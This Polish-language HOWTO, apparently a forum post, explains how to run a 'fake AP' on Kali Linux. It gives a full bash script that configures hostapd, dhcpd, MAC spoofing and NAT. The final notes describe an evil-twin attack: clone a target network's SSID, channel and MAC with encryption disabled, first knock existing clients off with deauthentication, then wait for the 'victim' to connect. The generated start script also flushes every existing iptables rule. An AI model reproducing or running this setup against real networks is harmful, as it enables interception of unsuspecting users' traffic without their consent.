Fake AP - HOWTO

1. Przygotowanie

kupujemy karte wifi z mozliwoscia master-mode w moim przypadku: TP-Link TL-WN822N (ok. 49 PLN) http://www.ceneo.pl/10856354#tab=spec

pobieramy / instalujemy Kali linux - http://www.kali.org/downloads/ (moze byc vmware)

apt-get update ; apt-get upgrade
apt-get install hostapd
apt-get install isc-dhcp-server


tworzymy skrypt generujacy adresacje:
cd /root ; touch hapc ; chmod 700 hapc

w /root/hapc wklejamy:


Kod:
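#!/bin/bash
#
# hapc - interactive helper that writes a hostapd configuration, a dhcpd
# configuration and a small start script, then (optionally) starts the AP.
#
# Usage: hapc UPLINK_IFACE WIFI_IFACE
#   UPLINK_IFACE  interface that already has Internet access; client traffic
#                 is NAT-ed (MASQUERADE) out of it
#   WIFI_IFACE    wireless interface that hostapd runs in master mode
#
# Files written (all under /root, as in the original version):
#   /root/hap_default.conf  hostapd config, mode 0600 (it holds the passphrase)
#   /root/dhcpd.conf        dhcpd config, also copied to /etc/dhcp/
#   /root/hap               start script; re-run it to bring the same AP back
#
# Must run as root. Every answer is read with `read -r` and validated before
# it is interpolated into a config file or into the generated start script
# (the start script is executed, so unvalidated input would be shell code).
set -u   # not -e: pkill returns 1 when nothing was running, which is fine here

readonly GREEN=$'\e[0;32m'
readonly RED=$'\e[0;31m'
readonly CYAN=$'\e[0;36m'
readonly END=$'\e[0m'

readonly HAP_CONF=/root/hap_default.conf
readonly DHCPD_CONF=/root/dhcpd.conf
readonly HAP_SCRIPT=/root/hap
readonly DEFAULT_NET=192.168.5

die() { printf '%s\n' "$*" >&2; exit 1; }
rule() { printf '===================================\n'; }
usage() { printf 'Usage: %s UPLINK_IFACE WIFI_IFACE\n' "${0##*/}" >&2; }

#######################################
# Print a coloured prompt and read one raw line into a variable.
# Arguments: $1 colour escape, $2 prompt text, $3 name of the target variable
# Returns:   dies on EOF so an empty stdin never silently reaches the config
#######################################
ask() {
  printf '%s%s%s' "$1" "$2" "$END"
  IFS= read -r "$3" || die 'no input (EOF)'
}

# Same as ask, but without local echo - used for the WPA2 passphrase so it is
# not left on screen or in a terminal scrollback.
ask_secret() {
  printf '%s%s%s' "$1" "$2" "$END"
  IFS= read -rs "$3" || die 'no input (EOF)'
  printf '\n'
}

# valid_iface STR - Linux interface name: 1-15 chars from a safe set
valid_iface() {
  local re='^[A-Za-z0-9_.:-]{1,15}$'
  [[ $1 =~ $re ]]
}

# valid_net_prefix STR - first three dotted-decimal octets, e.g. 192.168.5
valid_net_prefix() {
  local re='^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$' octet
  [[ $1 =~ $re ]] || return 1
  for octet in "${BASH_REMATCH[@]:1}"; do
    (( 10#$octet <= 255 )) || return 1
  done
}

# valid_channel STR - positive integer; hostapd checks the band-specific range
valid_channel() {
  local re='^[0-9]{1,3}$'
  [[ $1 =~ $re ]] && (( 10#$1 >= 1 ))
}

# valid_mac STR - six colon-separated hex octets
valid_mac() {
  local re='^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
  [[ $1 =~ $re ]]
}

# valid_flag STR - exactly 0 or 1
valid_flag() { [[ $1 == 0 || $1 == 1 ]]; }

#######################################
# Print the hostapd configuration to stdout (42 lines, same keys and fixed
# values as the original; only the seven parameters vary).
# Arguments: $1 wifi iface, $2 ssid, $3 channel, $4 ieee80211n flag (0/1),
#            $5 ignore_broadcast_ssid flag (0/1), $6 wpa mode (0 or 2),
#            $7 passphrase (hostapd ignores it when wpa=0)
#######################################
hostapd_conf() {
  local iface=$1 ssid=$2 channel=$3 std=$4 hidden=$5 wpa=$6 pass=$7
  # In hostapd, wpa_pairwise governs WPA (v1) and rsn_pairwise governs WPA2;
  # with wpa=2 only the CCMP line is used, so the TKIP line is inert here.
  cat <<EOF
interface=$iface
driver=nl80211
own_ip_addr=127.0.0.1
country_code=PL
macaddr_acl=0
ignore_broadcast_ssid=$hidden
auth_algs=1
wpa=$wpa
wpa_passphrase=$pass
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
dtim_period=2
max_num_sta=30
rts_threshold=2347
fragm_threshold=2346
ssid=$ssid
hw_mode=g
wmm_enabled=1
wmm_ac_bk_cwmin=4
wmm_ac_bk_cwmax=10
wmm_ac_bk_aifs=7
wmm_ac_bk_txop_limit=0
wmm_ac_bk_acm=0
wmm_ac_be_aifs=3
wmm_ac_be_cwmin=4
wmm_ac_be_cwmax=10
wmm_ac_be_txop_limit=0
wmm_ac_be_acm=0
wmm_ac_vi_aifs=2
wmm_ac_vi_cwmin=3
wmm_ac_vi_cwmax=4
wmm_ac_vi_txop_limit=94
wmm_ac_vi_acm=0
wmm_ac_vo_aifs=2
wmm_ac_vo_cwmin=2
wmm_ac_vo_cwmax=3
wmm_ac_vo_txop_limit=47
wmm_ac_vo_acm=0
ieee80211n=$std
ht_capab=[SHORT-GI-40][DSSS_CCK-40]
channel=$channel
EOF
}

#######################################
# Print the isc-dhcp-server configuration to stdout.
# Arguments: $1 three-octet network prefix (e.g. 192.168.5); clients get
#            $1.100-$1.150 with $1.1 as router
#######################################
dhcpd_conf() {
  local net=$1
  cat <<EOF
authoritative;
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
subnet $net.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address $net.255;
option routers $net.1;
option domain-name-servers 208.67.222.222,208.67.220.220;
range $net.100 $net.150;
}
EOF
}

#######################################
# Print the start script to stdout. Note that it flushes every existing
# filter and nat rule on the host (iptables -F) before adding its own, as the
# original did; hostapd runs in the foreground so Ctrl-C stops the AP.
# Arguments: $1 uplink iface, $2 wifi iface, $3 three-octet network prefix
#######################################
hap_script() {
  local uplink=$1 wifi=$2 net=$3
  cat <<EOF
#!/bin/bash
pkill hostapd
pkill dhcpd
ifconfig $wifi $net.1 netmask 255.255.255.0
route add -net $net.0 netmask 255.255.255.0 gw $net.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -F -t nat
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $uplink -j MASQUERADE
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
dhcpd -cf /etc/dhcp/dhcpd.conf $wifi
hostapd $HAP_CONF
exit 0
EOF
}

#######################################
# Interactive flow: cleanup, optional MAC change, questions, write configs,
# optionally generate and run the start script.
# Arguments: $1 uplink iface, $2 wifi iface
# Returns:   2 on usage error, 0 otherwise (die exits 1 on invalid answers)
#######################################
main() {
  if (( $# != 2 )); then
    usage
    return 2
  fi
  local uplink=$1 wifi=$2
  valid_iface "$uplink" || die "bad uplink interface name: $uplink"
  valid_iface "$wifi" || die "bad wifi interface name: $wifi"
  local spf='' spfo='' mac='' wpa='' pass='' std='' brd='' ssid='' chn=''
  local fap='' net_adr=''

  rule
  printf 'cleaning...\n'
  rm -f -- "$HAP_CONF"
  pkill hostapd || true
  pkill dhcpd || true
  rule

  ask "$RED" '[+] spoof mac address? y/n: ' spf
  if [[ $spf == y ]]; then
    ifconfig "$wifi" down   # macchanger needs the link down; hostapd brings it up again
    ask "$CYAN" '[1] manual or [2] random: ' spfo
    if [[ $spfo == 1 ]]; then
      ask "$CYAN" $'\n[*] set new mac address: ' mac
      valid_mac "$mac" || die "invalid MAC address: $mac"
      macchanger -m "$mac" "$wifi"
    else
      macchanger -r "$wifi"
    fi
  fi
  rule

  ask "$CYAN" $'\n[*] set wpa2 security? y/n: ' wpa
  if [[ $wpa == y ]]; then
    ask_secret "$CYAN" $'\n[*] set wpa2 password: ' pass
    # hostapd accepts an 8-63 character passphrase for WPA-PSK; reject early
    # instead of letting hostapd fail after the config has been written
    (( ${#pass} >= 8 && ${#pass} <= 63 )) || die 'wpa2 passphrase must be 8-63 characters'
  fi
  ask "$CYAN" $'\n[*] set N standard? 1/0: ' std
  valid_flag "$std" || die "expected 1 or 0, got: $std"
  ask "$CYAN" $'\n[*] set invisible broadcast? 1/0: ' brd
  valid_flag "$brd" || die "expected 1 or 0, got: $brd"
  ask "$CYAN" $'\n[*] set SSID name: ' ssid
  (( ${#ssid} >= 1 && ${#ssid} <= 32 )) || die 'SSID must be 1-32 characters'
  ask "$CYAN" $'\n[*] set ap channel: ' chn
  valid_channel "$chn" || die "invalid channel: $chn"

  rule
  printf '%s[1] saving config...%s\n' "$GREEN" "$END"
  rule
  # umask 077 -> file is created 0600: it contains the passphrase, and the
  # original appended with the default umask, leaving it world-readable.
  if [[ $wpa == y ]]; then
    (umask 077; hostapd_conf "$wifi" "$ssid" "$chn" "$std" "$brd" 2 "$pass" > "$HAP_CONF")
  else
    # wpa=0 is an open network; the placeholder passphrase is ignored by hostapd
    (umask 077; hostapd_conf "$wifi" "$ssid" "$chn" "$std" "$brd" 0 test1234 > "$HAP_CONF")
  fi

  ask "$GREEN" '[2] turn on fake AP? y/n: ' fap
  if [[ $fap == y ]]; then
    ask "$GREEN" "[3] set LAN address (default: $DEFAULT_NET): " net_adr
    net_adr=${net_adr:-$DEFAULT_NET}   # the original printed a default but never applied it
    valid_net_prefix "$net_adr" || die "expected three dotted octets like $DEFAULT_NET, got: $net_adr"
    dhcpd_conf "$net_adr" > "$DHCPD_CONF"
    chmod 644 "$DHCPD_CONF"
    cp -- "$DHCPD_CONF" /etc/dhcp/
    hap_script "$uplink" "$wifi" "$net_adr" > "$HAP_SCRIPT"
    chmod 700 "$HAP_SCRIPT"
    "$HAP_SCRIPT"   # absolute path: the original ran ./hap and so only worked from /root
  fi
  return 0
}

main "$@"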

2. Uruchamiamy fake AP

./hapc eth_z_internetem wlan_karta_wifi (w moim przypadku ./hapc eth0 wlan1, jeśli wlan0 jest wan'em wystarczy ./hapc wlan0 wlan1)

legenda:

y - tak
n - nie

1 - tak
0 - nie

- spoof mac address? y/n # zmienic mac adres wifi ?
- [1] manual or [2] random # 1 - recznie, 2 - losowo
- set wpa2 security? y/n # uruchomic szyfrowanie wpa2?
- set wpa2 password # wpisz haslo wpa2
- set N standard? 1/0 # uruchomic standard N?
- set invisible broadcast? 1/0 # rozglaszac nazwe wifi?
- set SSID name # wpisz nazwe wifi
- set ap channel # podaj kanal transmisji

- turn on fake AP? y/n # czy uruchomic wifi?
- set LAN address # wpisz adresacje ip np. 192.168.10 dzieki tej opcji kazdy klient otrzyma adresacje z zakresu 192.168.10.100-192.168.10.150 :)

# jak wylaczyc transmitowanie fake WiFi?
ctr+c w terminalu z uruchomionym skryptem

# jak uruchomic poprzednia konfiguracje?
cd /root/ ; ./hap

Ps. jezeli podszywamy sie pod istniejaca juz siec wifi musimy wczesniej rozlaczyc broadcastem wszystkich klientow. Jezeli tego nie zrobimy, ofiara nadal bedzie polaczona ze stara sesja nie rozgloszonego juz SSID (podszyjemy sie pod docellowy AP z wylaczonymi zabezpieczeniami aczkolwiek wszyscy dotychczas aktywni klienci nadal beda korzystac z oryginalnego AP (; ).

Odpalamy wifi bez zabezpieczen o takim samym SSID, kanale transmisji, mac adresie i czekamy az klient sie podlaczy...

# Testowalem na hostapd w wersji 1.0
 